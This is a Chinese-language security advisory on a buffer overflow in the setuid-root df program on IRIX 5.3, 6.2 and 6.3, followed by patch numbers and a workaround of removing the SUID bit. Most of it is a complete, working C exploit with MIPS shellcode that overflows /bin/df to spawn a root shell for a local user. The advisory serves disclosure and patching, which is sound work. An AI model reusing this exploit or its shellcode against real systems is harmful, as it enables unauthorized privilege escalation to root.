IRIX 的df存在缓冲溢出

发布时间：2000-05-03
更新时间：2000-05-03
严重程度：高
威胁程度：本地管理员权限
错误类型：输入验证错误
利用方式：服务器模式

受影响系统

IRIX 5.3, 6.2, 6.3

详细描述
df(1)是用来显示磁盘使用统计和空余空间的程序。在IRIX5.3，6.2，6.3中存在安全漏洞，/bin/df 是以SUID ROOT来安装，并且可以通过本地用户来访问。下面的代码在以下的系统中测试通过： R3000 Indigo (Irix 5.3) R4400 Indy (Irix 5.3) R4400 Indigo 2, Irix 6.2 R4600 Indy, Irix 6.2 R5000 O2 (Irix 6.3) 通过使用CC或则GCC编译器，并加上-mips3或者-mips4 或则-n32来编译。

测试代码
-------------------- cut here -------------------
---------
    /* /bin/df buffer overflow exploit by DCRH */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/types.h>
    #include <unistd.h>

    #define BUF_LENGTH      1504
    #define EXTRA           700
    #define OFFSET          0x200
    #define IRIX_NOP        0x03e0f825    /*
move $ra,$ra */

    #define u_long unsigned

    u_long get_sp_code[] = {
        0x03a01025,         /* move
$v0,$sp         */
        0x03e00008,         /* jr
$ra               */
        0x00000000,         /*
nop                  */
    };

    u_long irix_shellcode[] = {

        0x24041234,         /* li
$4,0x1234         */
        0x2084edcc,         /* sub
$4,0x1234        */
        0x0491fffe,         /* bgezal $4,pc-
4       */
        0x03bd302a,         /* sgt
$6,$sp,$sp       */
        0x23e4012c,         /* addi
$4,$31,264+36   */
        0xa086feff,         /* sb $6,-264+7
($4)     */
        0x2084fef8,         /* sub
$4,264           */
        0x20850110,         /* addi
$5,$4,264+8     */
        0xaca4fef8,         /* sw $4,-264
($5)       */
        0xaca6fefc,         /* sw $4,-260
($5)       */
        0x20a5fef8,         /* sub $5,
264          */
        0x240203f3,         /* li
$v0,1011          */
        0x03ffffcc,         /* syscall
0xfffff      */
        0x2f62696e,         /* "/bin"               */

        0x2f7368ff,         /* "/sh"                */

    };

    char buf[BUF_LENGTH + EXTRA + 8];

    void main(int argc, char **argv)
    {
        char *env[] = {NULL};
        u_long targ_addr, stack;
        u_long *long_p;
        int i, code_length = strlen((char *)
irix_shellcode)+1;
        u_long (*get_sp)(void) = (u_long (*)
(void))get_sp_code;

        stack = get_sp();

        long_p =(u_long *)  buf;
        targ_addr = stack + OFFSET;

        if (argc > 1)
            targ_addr += atoi(argv[1]) * 4;

        while ((targ_addr & 0xff000000) == 0 ||

               (targ_addr & 0x00ff0000) == 0 ||
               (targ_addr & 0x0000ff00) == 0 ||
               (targ_addr & 0x000000ff) == 0)
            targ_addr += 4;

        for (i = 0; i < (BUF_LENGTH -
code_length) / sizeof(u_long); i++)
            *long_p++ = IRIX_NOP;

        for (i = 0; i < code_length/sizeof
(u_long); i++)
            *long_p++ = irix_shellcode[i];

        for (i = 0; i < EXTRA / sizeof(u_long);
i++)
            *long_p++ = (targ_addr << 16) |
(targ_addr >> 16);

        *long_p = 0;

        printf("stack = 0x%x, targ_addr = 0x%
x\n", stack, targ_addr);

        execle("/bin/df", "df", &buf[3], 0, env);

        perror("execl failed");
    }

解决方案
补丁程序可以到SGI站点下载：
OS Version     Vulnerable?     Patch #
Other Actions
        ----------     -----------     -------
      -------------
        IRIX 3.x          unknown      not
avail    Upgrade
        IRIX 4.x          unknown      not
avail    Upgrade
        IRIX 5.0.x        yes          not
avail    Upgrade
        IRIX 5.1.x        yes          not
avail    Upgrade
        IRIX 5.2          yes          not
avail    Upgrade
        IRIX 5.3          yes          2224

        IRIX 6.0.x        yes          not
avail    Upgrade
        IRIX 6.1          yes          not
avail    Upgrade
        IRIX 6.2          yes          2177

        IRIX 6.3          yes          2232

        IRIX 6.4          yes          2233

或者临时去掉SUID位。

相关信息

最近严重漏洞

IRIX 的df存在缓冲溢出